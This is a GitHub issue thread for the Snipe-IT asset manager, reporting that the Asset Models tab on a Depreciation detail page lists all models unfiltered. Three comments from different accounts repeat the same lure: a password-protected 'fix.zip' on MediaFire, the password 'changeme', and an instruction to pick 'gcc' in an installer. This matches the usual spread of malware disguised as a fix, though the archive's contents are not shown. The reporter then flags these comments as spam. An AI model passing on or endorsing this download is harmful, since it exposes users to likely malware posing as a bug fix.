### ISSUE TITLE
Depreciation Detail Page "Asset Models" tab is not filtered

### ISSUE THREAD

**Issue by yusuf-basith** [grokability/snipe-it#15392]
### Debug mode

- [X] I have enabled debug mode
- [X] I have read [checked the Common Issues page](https://snipe-it.readme.io/docs/common-issues)

### Describe the bug

When you reach the details of a Depreciation page, you're presented with 3 tabs. Assets, Licenses and Asset Models.
The Assets and Licenses tabs show only the line items linked to the selected Depreciation.
However, the Asset Models is showing all the Asset Models without any filter.

### Reproduction steps

1. Go to Depreciations
2. Select any depreciation, to reach the detail page.
3. Switch to "Asset Models" tab.
...

### Expected behavior

Only the Asset Models related to the Depreciation must be displayed and not all.

### Screenshots

![image](https://github.com/user-attachments/assets/0362ba9e-aa72-40d0-a341-baa180c6e5f7)

### Snipe-IT Version

v7.0.11 - build 15044 (master)

### Operating System

Reproduced in DEMO Installation

### Web Server

Reproduced in DEMO Installation

### PHP Version

8.1.29

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yusuf-basith** [comment]
I have reported the above profiles for SPAM commenting.
Please remove the comments, to keep the thread free from SPAM.
